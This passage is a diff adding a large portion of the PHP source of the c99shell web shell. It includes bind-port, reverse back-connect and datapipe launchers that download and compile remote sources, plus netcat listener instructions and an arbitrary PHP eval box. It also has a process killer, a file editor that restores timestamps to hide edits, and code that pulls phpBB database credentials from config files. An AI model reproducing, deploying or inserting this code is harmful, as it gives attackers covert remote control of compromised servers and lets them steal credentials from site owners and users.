+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "c99sh_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "c99sh_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+ 
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+  
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+ 
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "<b>Result of binding port:</b><br>";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "<b>Result of back connection:</b><br>";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "<b>Result of datapipe-running:</b><br>";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("		",$ret)) {$ret = str_replace("		","	",$ret);}
+   while (ereg("	 ",$ret)) {$ret = str_replace("	 ","	",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("	",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("	",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+   array("Code","code"),
+   array("Session","phpsess"),
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+   array("SDB","sdb"),
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,true)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ $images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
